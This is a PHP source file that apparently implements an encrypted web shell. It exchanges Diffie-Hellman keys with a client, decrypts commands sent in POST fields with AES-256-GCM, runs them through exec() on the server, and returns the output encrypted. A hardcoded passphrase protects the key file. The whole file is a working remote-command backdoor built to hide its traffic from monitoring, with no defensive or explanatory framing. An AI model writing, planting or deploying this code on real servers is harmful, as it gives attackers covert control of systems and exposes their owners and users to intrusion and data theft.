<?php
function generate_keys() {
  $configargs = array();
  // https://www.php.net/manual/en/function.openssl-dh-compute-key.php
  // openssl dhparam -out dhparam.pem 2048
  // openssl dh -in dhparam.pem -noout  -text

  $configargs['p'] = hex2bin('00b65b09faddae75d1934970160687b5d62b51544a37a387e8b31745472e9848a2b3b1dbcca16d3967f6792192de5bfdd8361a2b4060f24c523c3e3013a359e4e923197d5f755d28c2b55a92f0bdf333fc8d65d6c3f1c050250b69dfbc70bfc93204b37289115a5eaf563d1d042361611dbcb172769672f53fdae41fcac27fc9a3ebd2241f16449a43a225e73cc1d215f10ad37cda4aa8269d8c880a570211a2e851383887566c4a738e33213b85993d848aa159b1ac8dabbde2375a004f142c433bacf48c5930d389a00bd3d1f0bb84a96c8b07ed372618f8675f234fb1d44456dc9333f8837512e0e6c5651559eb8ba3f038b82c5fbcfe769de528ccb8e73673');
  $configargs['g'] = hex2bin('02');

  // Passphrase doesn't matter as it's sent over the network.
  $passphrase = '86Tn$dxymLQfNUWsF';

  // Check if we already have it saved 
  $private_key = openssl_pkey_get_private("file://privateserver.pem", $passphrase);
  if(!$private_key) {
    $private_key = openssl_pkey_new(array('dh' => $configargs));
    openssl_pkey_export_to_file($private_key,'privateserver.pem',$passphrase);
  }

  $details = openssl_pkey_get_details($private_key);
  $public_key = $details['dh']['pub_key'];
  file_put_contents("publicserver.pem", $details['key']);

  return array("private" => $private_key, "public" => $public_key);
}

// Returns:
//  ciphertext - The encrypted payload
//  iv  - for randomness in ciphertext
//  tag - for verification 
function encrypt($plaintext, $aes_key) {
  // Encrypt payloads
  $cipher = "aes-256-gcm";
  $ivlen = openssl_cipher_iv_length($cipher);
  $iv = openssl_random_pseudo_bytes($ivlen);
  $options = 0;
  $ciphertext = openssl_encrypt($plaintext, $cipher, $aes_key, $options=0, $iv, $tag);
  return array("ciphertext" => $ciphertext, "iv" => $iv, "tag" => $tag);
}

// Returns:
function decrypt_post_request($aes_key) {
  // Decrypt post request

  $ciphertext = $_POST['ciphertext']; 
  $cipher = "aes-256-gcm";
  $tag = hex2bin($_POST['hex_tag']); 
  $iv = hex2bin($_POST['hex_iv']);
  $options = 0;

  return openssl_decrypt($ciphertext, $cipher, $aes_key, $options=0, $iv, $tag);
}


$keys = generate_keys();
$private_key = $keys['private'];
$public_key  = $keys['public'];
if(isset($_POST["ciphertext"]) && isset($_POST['public_client']) && isset($_POST['hex_iv']) && isset($_POST['hex_tag'])) {

  $remote_public_key = hex2bin($_POST['public_client']);
  $shared_secret = openssl_dh_compute_key($remote_public_key, $private_key);
 
  // Decrypt incoming payload
  $plaintext = decrypt_post_request($shared_secret);

  // Execute 
  exec($plaintext, $output);
  $payload_result = implode("\n", $output);

  // Encrypt answer
  $encrypted = encrypt($payload_result, $shared_secret);

  // Output response
  echo bin2hex($encrypted['tag']) . "\n";
  echo bin2hex($encrypted['iv']) . "\n";
  echo $encrypted['ciphertext'];
} else {
  echo bin2hex($public_key)."\n";
}
?>